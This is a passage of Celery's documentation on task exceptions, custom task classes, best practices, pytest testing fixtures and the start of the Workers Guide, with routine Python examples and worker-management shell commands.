code-block:: python class HttpError(Exception): def __init__(self, status_code, headers=None, body=None): self.status_code = status_code self.headers = headers self.body = body super(HttpError, self).__init__(status_code, headers, body) .. _task-semipredicates: Semipredicates ============== The worker wraps the task in a tracing function that records the final state of the task. There are a number of exceptions that can be used to signal this function to change how it treats the return of the task. .. _task-semipred-ignore: Ignore ------ The task may raise :exc:`~@Ignore` to force the worker to ignore the task. This means that no state will be recorded for the task, but the message is still acknowledged (removed from queue). This can be used if you want to implement custom revoke-like functionality, or manually store the result of a task. Example keeping revoked tasks in a Redis set: .. code-block:: python from celery.exceptions import Ignore @app.task(bind=True) def some_task(self): if redis.ismember('tasks.revoked', self.request.id): raise Ignore() Example that stores results manually: .. code-block:: python from celery import states from celery.exceptions import Ignore @app.task(bind=True) def get_tweets(self, user): timeline = twitter.get_timeline(user) if not self.request.called_directly: self.update_state(state=states.SUCCESS, meta=timeline) raise Ignore() .. _task-semipred-reject: Reject ------ The task may raise :exc:`~@Reject` to reject the task message using AMQPs ``basic_reject`` method. This won't have any effect unless :attr:`Task.acks_late` is enabled. Rejecting a message has the same effect as acking it, but some brokers may implement additional functionality that can be used. For example RabbitMQ supports the concept of `Dead Letter Exchanges`_ where a queue can be configured to use a dead letter exchange that rejected messages are redelivered to. .. _`Dead Letter Exchanges`: http://www.rabbitmq.com/dlx.html Reject can also be used to re-queue messages, but please be very careful when using this as it can easily result in an infinite message loop. Example using reject when a task causes an out of memory condition: .. code-block:: python import errno from celery.exceptions import Reject @app.task(bind=True, acks_late=True) def render_scene(self, path): file = get_file(path) try: renderer.render_scene(file) # if the file is too big to fit in memory # we reject it so that it's redelivered to the dead letter exchange # and we can manually inspect the situation. except MemoryError as exc: raise Reject(exc, requeue=False) except OSError as exc: if exc.errno == errno.ENOMEM: raise Reject(exc, requeue=False) # For any other error we retry after 10 seconds. except Exception as exc: raise self.retry(exc, countdown=10) Example re-queuing the message: .. code-block:: python from celery.exceptions import Reject @app.task(bind=True, acks_late=True) def requeues(self): if not self.request.delivery_info['redelivered']: raise Reject('no reason', requeue=True) print('received two times') Consult your broker documentation for more details about the ``basic_reject`` method. .. _task-semipred-retry: Retry ----- The :exc:`~@Retry` exception is raised by the ``Task.retry`` method to tell the worker that the task is being retried. .. _task-custom-classes: Custom task classes =================== All tasks inherit from the :class:`@Task` class. The :meth:`~@Task.run` method becomes the task body. As an example, the following code, .. 
code-block:: python @app.task def add(x, y): return x + y will do roughly this behind the scenes: .. code-block:: python class _AddTask(app.Task): def run(self, x, y): return x + y add = app.tasks[_AddTask.name] Instantiation ------------- A task is **not** instantiated for every request, but is registered in the task registry as a global instance. This means that the ``__init__`` constructor will only be called once per process, and that the task class is semantically closer to an Actor. If you have a task, .. code-block:: python from celery import Task class NaiveAuthenticateServer(Task): def __init__(self): self.users = {'george': 'password'} def run(self, username, password): try: return self.users[username] == password except KeyError: return False And you route every request to the same process, then it will keep state between requests. This can also be useful to cache resources, For example, a base Task class that caches a database connection: .. code-block:: python from celery import Task class DatabaseTask(Task): _db = None @property def db(self): if self._db is None: self._db = Database.connect() return self._db Per task usage ~~~~~~~~~~~~~~ The above can be added to each task like this: .. code-block:: python @app.task(base=DatabaseTask) def process_rows(): for row in process_rows.db.table.all(): process_row(row) The ``db`` attribute of the ``process_rows`` task will then always stay the same in each process. .. _custom-task-cls-app-wide: App-wide usage ~~~~~~~~~~~~~~ You can also use your custom class in your whole Celery app by passing it as the ``task_cls`` argument when instantiating the app. This argument should be either a string giving the python path to your Task class or the class itself: .. code-block:: python from celery import Celery app = Celery('tasks', task_cls='your.module.path:DatabaseTask') This will make all your tasks declared using the decorator syntax within your app to use your ``DatabaseTask`` class and will all have a ``db`` attribute. The default value is the class provided by Celery: ``'celery.app.task:Task'``. Handlers -------- .. method:: before_start(self, task_id, args, kwargs) Run by the worker before the task starts executing. .. versionadded:: 5.2 :param task_id: Unique id of the task to execute. :param args: Original arguments for the task to execute. :param kwargs: Original keyword arguments for the task to execute. The return value of this handler is ignored. .. method:: after_return(self, status, retval, task_id, args, kwargs, einfo) Handler called after the task returns. :param status: Current task state. :param retval: Task return value/exception. :param task_id: Unique id of the task. :param args: Original arguments for the task that returned. :param kwargs: Original keyword arguments for the task that returned. :keyword einfo: :class:`~billiard.einfo.ExceptionInfo` instance, containing the traceback (if any). The return value of this handler is ignored. .. method:: on_failure(self, exc, task_id, args, kwargs, einfo) This is run by the worker when the task fails. :param exc: The exception raised by the task. :param task_id: Unique id of the failed task. :param args: Original arguments for the task that failed. :param kwargs: Original keyword arguments for the task that failed. :keyword einfo: :class:`~billiard.einfo.ExceptionInfo` instance, containing the traceback. The return value of this handler is ignored. .. method:: on_retry(self, exc, task_id, args, kwargs, einfo) This is run by the worker when the task is to be retried. 
:param exc: The exception sent to :meth:`~@Task.retry`. :param task_id: Unique id of the retried task. :param args: Original arguments for the retried task. :param kwargs: Original keyword arguments for the retried task. :keyword einfo: :class:`~billiard.einfo.ExceptionInfo` instance, containing the traceback. The return value of this handler is ignored. .. method:: on_success(self, retval, task_id, args, kwargs) Run by the worker if the task executes successfully. :param retval: The return value of the task. :param task_id: Unique id of the executed task. :param args: Original arguments for the executed task. :param kwargs: Original keyword arguments for the executed task. The return value of this handler is ignored. .. _task-requests-and-custom-requests: Requests and custom requests ---------------------------- Upon receiving a message to run a task, the `worker `:ref: creates a `request `:class: to represent such demand. Custom task classes may override which request class to use by changing the attribute `celery.app.task.Task.Request`:attr:. You may either assign the custom request class itself, or its fully qualified name. The request has several responsibilities. Custom request classes should cover them all -- they are responsible to actually run and trace the task. We strongly recommend to inherit from `celery.worker.request.Request`:class:. When using the `pre-forking worker `:ref:, the methods `~celery.worker.request.Request.on_timeout`:meth: and `~celery.worker.request.Request.on_failure`:meth: are executed in the main worker process. An application may leverage such facility to detect failures which are not detected using `celery.app.task.Task.on_failure`:meth:. As an example, the following custom request detects and logs hard time limits, and other failures. .. code-block:: python import logging from celery import Task from celery.worker.request import Request logger = logging.getLogger('my.package') class MyRequest(Request): 'A minimal custom request to log failures and hard time limits.' def on_timeout(self, soft, timeout): super(MyRequest, self).on_timeout(soft, timeout) if not soft: logger.warning( 'A hard timeout was enforced for task %s', self.task.name ) def on_failure(self, exc_info, send_failed_event=True, return_ok=False): super().on_failure( exc_info, send_failed_event=send_failed_event, return_ok=return_ok ) logger.warning( 'Failure detected for task %s', self.task.name ) class MyTask(Task): Request = MyRequest # you can use a FQN 'my.package:MyRequest' @app.task(base=MyTask) def some_longrunning_task(): # use your imagination .. _task-how-they-work: How it works ============ Here come the technical details. This part isn't something you need to know, but you may be interested. All defined tasks are listed in a registry. The registry contains a list of task names and their task classes. You can investigate this registry yourself: .. code-block:: pycon >>> from proj.celery import app >>> app.tasks {'celery.chord_unlock': <@task: celery.chord_unlock>, 'celery.backend_cleanup': <@task: celery.backend_cleanup>, 'celery.chord': <@task: celery.chord>} This is the list of tasks built into Celery. Note that tasks will only be registered when the module they're defined in is imported. The default loader imports any modules listed in the :setting:`imports` setting. The :meth:`@task` decorator is responsible for registering your task in the applications task registry. When tasks are sent, no actual function code is sent with it, just the name of the task to execute. 
When the worker then receives the message it can look up the name in its task registry to find the execution code. This means that your workers should always be updated with the same software as the client. This is a drawback, but the alternative is a technical challenge that's yet to be solved.

.. _task-best-practices:

Tips and Best Practices
=======================

.. _task-ignore_results:

Ignore results you don't want
-----------------------------

If you don't care about the results of a task, be sure to set the :attr:`~@Task.ignore_result` option, as storing results wastes time and resources.

.. code-block:: python

    @app.task(ignore_result=True)
    def mytask():
        something()

Results can even be disabled globally using the :setting:`task_ignore_result` setting.

.. versionadded:: 4.2

Results can be enabled/disabled on a per-execution basis by passing the ``ignore_result`` boolean parameter when calling ``apply_async`` or ``delay``.

.. code-block:: python

    @app.task
    def mytask(x, y):
        return x + y

    # No result will be stored
    result = mytask.apply_async((1, 2), ignore_result=True)
    print(result.get())  # -> None

    # Result will be stored
    result = mytask.apply_async((1, 2), ignore_result=False)
    print(result.get())  # -> 3

By default tasks will *not ignore results* (``ignore_result=False``) when a result backend is configured. The option precedence order is the following:

1. Global :setting:`task_ignore_result`
2. :attr:`~@Task.ignore_result` option
3. Task execution option ``ignore_result``

More optimization tips
----------------------

You can find additional optimization tips in the :ref:`Optimizing Guide `.

.. _task-synchronous-subtasks:

Avoid launching synchronous subtasks
------------------------------------

Having a task wait for the result of another task is really inefficient, and may even cause a deadlock if the worker pool is exhausted. Make your design asynchronous instead, for example by using *callbacks*.

**Bad**:

.. code-block:: python

    @app.task
    def update_page_info(url):
        page = fetch_page.delay(url).get()
        info = parse_page.delay(url, page).get()
        store_page_info.delay(url, info)

    @app.task
    def fetch_page(url):
        return myhttplib.get(url)

    @app.task
    def parse_page(page):
        return myparser.parse_document(page)

    @app.task
    def store_page_info(url, info):
        return PageInfo.objects.create(url, info)

**Good**:

.. code-block:: python

    def update_page_info(url):
        # fetch_page -> parse_page -> store_page
        chain = fetch_page.s(url) | parse_page.s() | store_page_info.s(url)
        chain()

    @app.task()
    def fetch_page(url):
        return myhttplib.get(url)

    @app.task()
    def parse_page(page):
        return myparser.parse_document(page)

    @app.task(ignore_result=True)
    def store_page_info(info, url):
        PageInfo.objects.create(url=url, info=info)

Here I instead created a chain of tasks by linking together different :func:`~celery.signature`'s. You can read about chains and other powerful constructs at :ref:`designing-workflows`. By default Celery will not allow you to run subtasks synchronously within a task, but in rare or extreme cases you might need to do so. **WARNING**: enabling subtasks to run synchronously is not recommended!
.. code-block:: python

    @app.task
    def update_page_info(url):
        page = fetch_page.delay(url).get(disable_sync_subtasks=False)
        info = parse_page.delay(url, page).get(disable_sync_subtasks=False)
        store_page_info.delay(url, info)

    @app.task
    def fetch_page(url):
        return myhttplib.get(url)

    @app.task
    def parse_page(url, page):
        return myparser.parse_document(page)

    @app.task
    def store_page_info(url, info):
        return PageInfo.objects.create(url, info)

.. _task-performance-and-strategies:

Performance and Strategies
==========================

.. _task-granularity:

Granularity
-----------

The task granularity is the amount of computation needed by each subtask. In general it is better to split the problem up into many small tasks rather than have a few long running tasks. With smaller tasks you can process more tasks in parallel and the tasks won't run long enough to block the worker from processing other waiting tasks. However, executing a task does have overhead. A message needs to be sent, data may not be local, etc. So if the tasks are too fine-grained the overhead added probably removes any benefit.

.. seealso::

    The book `Art of Concurrency`_ has a section dedicated to the topic of task granularity [AOC1]_.

.. _`Art of Concurrency`: http://oreilly.com/catalog/9780596521547

.. [AOC1] Breshears, Clay. Section 2.2.1, "The Art of Concurrency". O'Reilly Media, Inc. May 15, 2009. ISBN-13 978-0-596-52153-0.

.. _task-data-locality:

Data locality
-------------

The worker processing the task should be as close to the data as possible. The best would be to have a copy in memory, the worst would be a full transfer from another continent. If the data is far away, you could try to run another worker at that location, or if that's not possible, cache often-used data, or preload data you know is going to be used. The easiest way to share data between workers is to use a distributed cache system, like `memcached`_.

.. seealso::

    The paper `Distributed Computing Economics`_ by Jim Gray is an excellent introduction to the topic of data locality.

.. _`Distributed Computing Economics`: http://research.microsoft.com/pubs/70001/tr-2003-24.pdf

.. _`memcached`: http://memcached.org/

.. _task-state:

State
-----

Since Celery is a distributed system, you can't know which process, or on what machine the task will be executed. You can't even know if the task will run in a timely manner. The ancient async sayings tell us that “asserting the world is the responsibility of the task”. What this means is that the world view may have changed since the task was requested, so the task is responsible for making sure the world is how it should be; if you have a task that re-indexes a search engine, and the search engine should only be re-indexed at maximum every 5 minutes, then it must be the task's responsibility to assert that, not the caller's.

Another gotcha is Django model objects. They shouldn't be passed on as arguments to tasks. It's almost always better to re-fetch the object from the database when the task is running instead, as using old data may lead to race conditions. Imagine the following scenario where you have an article and a task that automatically expands some abbreviations in it:

.. code-block:: python

    class Article(models.Model):
        title = models.CharField()
        body = models.TextField()

    @app.task
    def expand_abbreviations(article):
        article.body = article.body.replace('MyCorp', 'My Corporation')
        article.save()

First, an author creates an article and saves it, then the author clicks on a button that initiates the abbreviation task:
.. code-block:: pycon

    >>> article = Article.objects.get(id=102)
    >>> expand_abbreviations.delay(article)

Now, the queue is very busy, so the task won't be run for another 2 minutes. In the meantime another author makes changes to the article, so when the task is finally run, the body of the article is reverted to the old version because the task had the old body in its argument. Fixing the race condition is easy: just use the article id instead, and re-fetch the article in the task body:

.. code-block:: python

    @app.task
    def expand_abbreviations(article_id):
        article = Article.objects.get(id=article_id)
        article.body = article.body.replace('MyCorp', 'My Corporation')
        article.save()

.. code-block:: pycon

    >>> expand_abbreviations.delay(article_id)

There might even be performance benefits to this approach, as sending large messages may be expensive.

.. _task-database-transactions:

Database transactions
---------------------

Let's have a look at another example:

.. code-block:: python

    from django.db import transaction
    from django.http import HttpResponseRedirect

    @transaction.atomic
    def create_article(request):
        article = Article.objects.create()
        expand_abbreviations.delay(article.pk)
        return HttpResponseRedirect('/articles/')

This is a Django view creating an article object in the database, then passing the primary key to a task. It uses the `transaction.atomic` decorator, which will commit the transaction when the view returns, or roll back if the view raises an exception. There's a race condition if the task starts executing before the transaction has been committed: the database object doesn't exist yet! The solution is to use the ``on_commit`` callback to launch your Celery task once all transactions have been committed successfully.

.. code-block:: python

    from django.db.transaction import on_commit

    def create_article(request):
        article = Article.objects.create()
        on_commit(lambda: expand_abbreviations.delay(article.pk))

.. note::
    ``on_commit`` is available in Django 1.9 and above. If you are using a version prior to that, the `django-transaction-hooks`_ library adds support for this.

.. _`django-transaction-hooks`: https://github.com/carljm/django-transaction-hooks

.. _task-example:

Example
=======

Let's take a real world example: a blog where comments posted need to be filtered for spam. When the comment is created, the spam filter runs in the background, so the user doesn't have to wait for it to finish. I have a Django blog application allowing comments on blog posts. I'll describe parts of the models/views and tasks for this application.

``blog/models.py``
------------------

The comment model looks like this:

.. code-block:: python

    from django.db import models
    from django.utils.translation import ugettext_lazy as _

    class Comment(models.Model):
        name = models.CharField(_('name'), max_length=64)
        email_address = models.EmailField(_('email address'))
        homepage = models.URLField(_('home page'), blank=True, verify_exists=False)
        comment = models.TextField(_('comment'))
        pub_date = models.DateTimeField(_('Published date'), editable=False, auto_now_add=True)
        is_spam = models.BooleanField(_('spam?'), default=False, editable=False)

        class Meta:
            verbose_name = _('comment')
            verbose_name_plural = _('comments')

In the view where the comment is posted, I first write the comment to the database, then I launch the spam filter task in the background.

.. _task-example-blog-views:

``blog/views.py``
-----------------
.. code-block:: python

    from django import forms
    from django.http import HttpResponseRedirect
    from django.template.context import RequestContext
    from django.shortcuts import get_object_or_404, render_to_response

    from blog import tasks
    from blog.models import Comment


    class CommentForm(forms.ModelForm):

        class Meta:
            model = Comment


    def add_comment(request, slug, template_name='comments/create.html'):
        post = get_object_or_404(Entry, slug=slug)
        remote_addr = request.META.get('REMOTE_ADDR')

        if request.method == 'POST':
            form = CommentForm(request.POST, request.FILES)
            if form.is_valid():
                comment = form.save()
                # Check spam asynchronously.
                tasks.spam_filter.delay(comment_id=comment.id,
                                        remote_addr=remote_addr)
                return HttpResponseRedirect(post.get_absolute_url())
        else:
            form = CommentForm()

        context = RequestContext(request, {'form': form})
        return render_to_response(template_name, context_instance=context)

To filter spam in comments I use `Akismet`_, the service used to filter spam in comments posted to the free blog platform `WordPress`. `Akismet`_ is free for personal use, but for commercial use you need to pay. You have to sign up to their service to get an API key. To make API calls to `Akismet`_ I use the `akismet.py`_ library written by `Michael Foord`_.

.. _task-example-blog-tasks:

``blog/tasks.py``
-----------------

.. code-block:: python

    from celery import Celery

    from akismet import Akismet

    from django.conf import settings
    from django.core.exceptions import ImproperlyConfigured
    from django.contrib.sites.models import Site

    from blog.models import Comment

    app = Celery(broker='amqp://')


    @app.task
    def spam_filter(comment_id, remote_addr=None):
        logger = spam_filter.get_logger()
        logger.info('Running spam filter for comment %s', comment_id)

        comment = Comment.objects.get(pk=comment_id)
        current_domain = Site.objects.get_current().domain
        akismet = Akismet(settings.AKISMET_KEY, 'http://{0}'.format(current_domain))
        if not akismet.verify_key():
            raise ImproperlyConfigured('Invalid AKISMET_KEY')

        is_spam = akismet.comment_check(user_ip=remote_addr,
                                        comment_content=comment.comment,
                                        comment_author=comment.name,
                                        comment_author_email=comment.email_address)
        if is_spam:
            comment.is_spam = True
            comment.save()

        return is_spam

.. _`Akismet`: http://akismet.com/faq/
.. _`akismet.py`: http://www.voidspace.org.uk/downloads/akismet.py
.. _`Michael Foord`: http://www.voidspace.org.uk/
.. _`exponential backoff`: https://en.wikipedia.org/wiki/Exponential_backoff
.. _`jitter`: https://en.wikipedia.org/wiki/Jitter

.. _testing:

================================================================
 Testing with Celery
================================================================

Tasks and unit tests
====================

To test task behavior in unit tests the preferred method is mocking.

.. admonition:: Eager mode

    The eager mode enabled by the :setting:`task_always_eager` setting is by definition not suitable for unit tests. When testing with eager mode you are only testing an emulation of what happens in a worker, and there are many discrepancies between the emulation and what happens in reality.

    Note that eagerly executed tasks don't write results to the backend by default. If you want to enable this functionality, have a look at :setting:`task_store_eager_result`.
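If you do want eagerly executed tasks to write their results (for example, in an integration-style test that asserts on stored state), the relevant settings can be combined roughly as shown below. This is a minimal sketch only: both setting names are real Celery settings, but the ``app`` instance and the in-memory cache backend are assumptions made for illustration.

.. code-block:: python

    # Sketch only: enable eager execution *and* eager result storage.
    app.conf.update(
        task_always_eager=True,         # run tasks inline instead of sending them
        task_store_eager_result=True,   # also write eager results to the result backend
        result_backend='cache+memory://',
    )

Keep in mind the admonition above: eager mode only emulates a worker, so prefer mocking for unit tests.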
A Celery task is much like a web view, in that it should only define how to perform the action in the context of being called as a task. This means optimally tasks only handle things like serialization, message headers, retries, and so on, with the actual logic implemented elsewhere. Say we had a task like this:

.. code-block:: python

    from decimal import Decimal

    from django.db import OperationalError

    from .models import Product


    @app.task(bind=True)
    def send_order(self, product_pk, quantity, price):
        price = Decimal(price)  # json serializes this to string.

        # models are passed by id, not serialized.
        product = Product.objects.get(pk=product_pk)
        try:
            product.order(quantity, price)
        except OperationalError as exc:
            raise self.retry(exc=exc)

``Note``: A task being `bound `_ means the first argument to the task will always be the task instance (``self``), so you can use the Task class methods and attributes from within the task body.

You could write unit tests for this task, using mocking like in this example:

.. code-block:: python

    from decimal import Decimal

    from pytest import raises

    from celery.exceptions import Retry

    # for python 2: use mock.patch from `pip install mock`.
    from unittest.mock import patch

    from django.db import OperationalError

    from proj.models import Product
    from proj.tasks import send_order


    class test_send_order:

        @patch('proj.tasks.Product.order')  # < patching Product in module above
        def test_success(self, product_order):
            product = Product.objects.create(
                name='Foo',
            )
            send_order(product.pk, 3, Decimal(30.3))
            product_order.assert_called_with(3, Decimal(30.3))

        @patch('proj.tasks.Product.order')
        @patch('proj.tasks.send_order.retry')
        def test_failure(self, send_order_retry, product_order):
            product = Product.objects.create(
                name='Foo',
            )

            # Set a side effect on the patched methods
            # so that they raise the errors we want.
            send_order_retry.side_effect = Retry()
            product_order.side_effect = OperationalError()

            with raises(Retry):
                send_order(product.pk, 3, Decimal(30.6))

.. _pytest_plugin:

pytest
======

.. versionadded:: 4.0

Celery also makes a :pypi:`pytest` plugin available that adds fixtures that you can use in your integration (or unit) test suites.

Enabling
--------

Celery initially ships the plugin in a disabled state; to enable it you can either:

* ``pip install celery[pytest]``
* ``pip install pytest-celery``
* or add an environment variable ``PYTEST_PLUGINS=celery.contrib.pytest``
* or add ``pytest_plugins = ("celery.contrib.pytest", )`` to your root conftest.py

Marks
-----

``celery`` - Set test app configuration.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

The ``celery`` mark enables you to override the configuration used for a single test case:

.. code-block:: python

    @pytest.mark.celery(result_backend='redis://')
    def test_something():
        ...

or for all the test cases in a class:

.. code-block:: python

    @pytest.mark.celery(result_backend='redis://')
    class test_something:

        def test_one(self):
            ...

        def test_two(self):
            ...

Fixtures
--------

Function scope
^^^^^^^^^^^^^^

``celery_app`` - Celery app used for testing.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This fixture returns a Celery app you can use for testing. Example:

.. code-block:: python

    def test_create_task(celery_app, celery_worker):
        @celery_app.task
        def mul(x, y):
            return x * y

        assert mul.delay(4, 4).get(timeout=10) == 16

``celery_worker`` - Embed live worker.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This fixture starts a Celery worker instance that you can use for integration tests. The worker will be started in a *separate thread* and will be shut down as soon as the test returns.
By default the fixture will wait up to 10 seconds for the worker to complete outstanding tasks and will raise an exception if the time limit is exceeded. The timeout can be customized by setting the ``shutdown_timeout`` key in the dictionary returned by the :func:`celery_worker_parameters` fixture. Example: .. code-block:: python # Put this in your conftest.py @pytest.fixture(scope='session') def celery_config(): return { 'broker_url': 'amqp://', 'result_backend': 'redis://' } def test_add(celery_worker): mytask.delay() # If you wish to override some setting in one test cases # only - you can use the ``celery`` mark: @pytest.mark.celery(result_backend='rpc') def test_other(celery_worker): ... Heartbeats are disabled by default which means that the test worker doesn't send events for ``worker-online``, ``worker-offline`` and ``worker-heartbeat``. To enable heartbeats modify the :func:`celery_worker_parameters` fixture: .. code-block:: python # Put this in your conftest.py @pytest.fixture(scope="session") def celery_worker_parameters(): return {"without_heartbeat": False} ... Session scope ^^^^^^^^^^^^^ ``celery_config`` - Override to setup Celery test app configuration. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can redefine this fixture to configure the test Celery app. The config returned by your fixture will then be used to configure the :func:`celery_app`, and :func:`celery_session_app` fixtures. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_config(): return { 'broker_url': 'amqp://', 'result_backend': 'rpc', } ``celery_parameters`` - Override to setup Celery test app parameters. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can redefine this fixture to change the ``__init__`` parameters of test Celery app. In contrast to :func:`celery_config`, these are directly passed to when instantiating :class:`~celery.Celery`. The config returned by your fixture will then be used to configure the :func:`celery_app`, and :func:`celery_session_app` fixtures. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_parameters(): return { 'task_cls': my.package.MyCustomTaskClass, 'strict_typing': False, } ``celery_worker_parameters`` - Override to setup Celery worker parameters. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can redefine this fixture to change the ``__init__`` parameters of test Celery workers. These are directly passed to :class:`~celery.worker.WorkController` when it is instantiated. The config returned by your fixture will then be used to configure the :func:`celery_worker`, and :func:`celery_session_worker` fixtures. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_worker_parameters(): return { 'queues': ('high-prio', 'low-prio'), 'exclude_queues': ('celery'), } ``celery_enable_logging`` - Override to enable logging in embedded workers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is a fixture you can override to enable logging in embedded workers. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_enable_logging(): return True ``celery_includes`` - Add additional imports for embedded workers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can override fixture to include modules when an embedded worker starts. You can have this return a list of module names to import, which can be task modules, modules registering signals, and so on. 
Example: .. code-block:: python @pytest.fixture(scope='session') def celery_includes(): return [ 'proj.tests.tasks', 'proj.tests.celery_signal_handlers', ] ``celery_worker_pool`` - Override the pool used for embedded workers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can override fixture to configure the execution pool used for embedded workers. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_worker_pool(): return 'prefork' .. warning:: You cannot use the gevent/eventlet pools, that is unless your whole test suite is running with the monkeypatches enabled. ``celery_session_worker`` - Embedded worker that lives throughout the session. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This fixture starts a worker that lives throughout the testing session (it won't be started/stopped for every test). Example: .. code-block:: python # Add this to your conftest.py @pytest.fixture(scope='session') def celery_config(): return { 'broker_url': 'amqp://', 'result_backend': 'rpc', } # Do this in your tests. def test_add_task(celery_session_worker): assert add.delay(2, 2) == 4 .. warning:: It's probably a bad idea to mix session and ephemeral workers... ``celery_session_app`` - Celery app used for testing (session scope). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This can be used by other session scoped fixtures when they need to refer to a Celery app instance. ``use_celery_app_trap`` - Raise exception on falling back to default app. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is a fixture you can override in your ``conftest.py``, to enable the "app trap": if something tries to access the default or current_app, an exception is raised. Example: .. code-block:: python @pytest.fixture(scope='session') def use_celery_app_trap(): return True If a test wants to access the default app, you would have to mark it using the ``depends_on_current_app`` fixture: .. code-block:: python @pytest.mark.usefixtures('depends_on_current_app') def test_something(): something() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/workers.rst0000664000175000017500000007373400000000000020065 0ustar00asifasif00000000000000.. _guide-workers: =============== Workers Guide =============== .. contents:: :local: :depth: 1 .. _worker-starting: Starting the worker =================== .. sidebar:: Daemonizing You probably want to use a daemonization tool to start the worker in the background. See :ref:`daemonizing` for help starting the worker as a daemon using popular service managers. You can start the worker in the foreground by executing the command: .. code-block:: console $ celery -A proj worker -l INFO For a full list of available command-line options see :mod:`~celery.bin.worker`, or simply do: .. code-block:: console $ celery worker --help You can start multiple workers on the same machine, but be sure to name each individual worker by specifying a node name with the :option:`--hostname ` argument: .. code-block:: console $ celery -A proj worker --loglevel=INFO --concurrency=10 -n worker1@%h $ celery -A proj worker --loglevel=INFO --concurrency=10 -n worker2@%h $ celery -A proj worker --loglevel=INFO --concurrency=10 -n worker3@%h The ``hostname`` argument can expand the following variables: - ``%h``: Hostname, including domain name. - ``%n``: Hostname only. - ``%d``: Domain name only. 
If the current hostname is *george.example.com*, these will expand to: +----------+----------------+------------------------------+ | Variable | Template | Result | +----------+----------------+------------------------------+ | ``%h`` | ``worker1@%h`` | *worker1@george.example.com* | +----------+----------------+------------------------------+ | ``%n`` | ``worker1@%n`` | *worker1@george* | +----------+----------------+------------------------------+ | ``%d`` | ``worker1@%d`` | *worker1@example.com* | +----------+----------------+------------------------------+ .. admonition:: Note for :pypi:`supervisor` users The ``%`` sign must be escaped by adding a second one: `%%h`. .. _worker-stopping: Stopping the worker =================== Shutdown should be accomplished using the :sig:`TERM` signal. When shutdown is initiated the worker will finish all currently executing tasks before it actually terminates. If these tasks are important, you should wait for it to finish before doing anything drastic, like sending the :sig:`KILL` signal. If the worker won't shutdown after considerate time, for being stuck in an infinite-loop or similar, you can use the :sig:`KILL` signal to force terminate the worker: but be aware that currently executing tasks will be lost (i.e., unless the tasks have the :attr:`~@Task.acks_late` option set). Also as processes can't override the :sig:`KILL` signal, the worker will not be able to reap its children; make sure to do so manually. This command usually does the trick: .. code-block:: console $ pkill -9 -f 'celery worker' If you don't have the :command:`pkill` command on your system, you can use the slightly longer version: .. code-block:: console $ ps auxww | awk '/celery worker/ {print $2}' | xargs kill -9 .. versionchanged:: 5.2 On Linux systems, Celery now supports sending :sig:`KILL` signal to all child processes after worker termination. This is done via `PR_SET_PDEATHSIG` option of ``prctl(2)``. .. _worker-restarting: Restarting the worker ===================== To restart the worker you should send the `TERM` signal and start a new instance. The easiest way to manage workers for development is by using `celery multi`: .. code-block:: console $ celery multi start 1 -A proj -l INFO -c4 --pidfile=/var/run/celery/%n.pid $ celery multi restart 1 --pidfile=/var/run/celery/%n.pid For production deployments you should be using init-scripts or a process supervision system (see :ref:`daemonizing`). Other than stopping, then starting the worker to restart, you can also restart the worker using the :sig:`HUP` signal. Note that the worker will be responsible for restarting itself so this is prone to problems and isn't recommended in production: .. code-block:: console $ kill -HUP $pid .. note:: Restarting by :sig:`HUP` only works if the worker is running in the background as a daemon (it doesn't have a controlling terminal). :sig:`HUP` is disabled on macOS because of a limitation on that platform. .. _worker-process-signals: Process Signals =============== The worker's main process overrides the following signals: +--------------+-------------------------------------------------+ | :sig:`TERM` | Warm shutdown, wait for tasks to complete. | +--------------+-------------------------------------------------+ | :sig:`QUIT` | Cold shutdown, terminate ASAP | +--------------+-------------------------------------------------+ | :sig:`USR1` | Dump traceback for all active threads. 
| +--------------+-------------------------------------------------+ | :sig:`USR2` | Remote debug, see :mod:`celery.contrib.rdb`. | +--------------+-------------------------------------------------+ .. _worker-files: Variables in file paths ======================= The file path arguments for :option:`--logfile `, :option:`--pidfile `, and :option:`--statedb ` can contain variables that the worker will expand: Node name replacements ---------------------- - ``%p``: Full node name. - ``%h``: Hostname, including domain name. - ``%n``: Hostname only. - ``%d``: Domain name only. - ``%i``: Prefork pool process index or 0 if MainProcess. - ``%I``: Prefork pool process index with separator. For example, if the current hostname is ``george@foo.example.com`` then these will expand to: - ``--logfile=%p.log`` -> :file:`george@foo.example.com.log` - ``--logfile=%h.log`` -> :file:`foo.example.com.log` - ``--logfile=%n.log`` -> :file:`george.log` - ``--logfile=%d.log`` -> :file:`example.com.log` .. _worker-files-process-index: Prefork pool process index -------------------------- The prefork pool process index specifiers will expand into a different filename depending on the process that'll eventually need to open the file. This can be used to specify one log file per child process. Note that the numbers will stay within the process limit even if processes exit or if autoscale/``maxtasksperchild``/time limits are used. That is, the number is the *process index* not the process count or pid. * ``%i`` - Pool process index 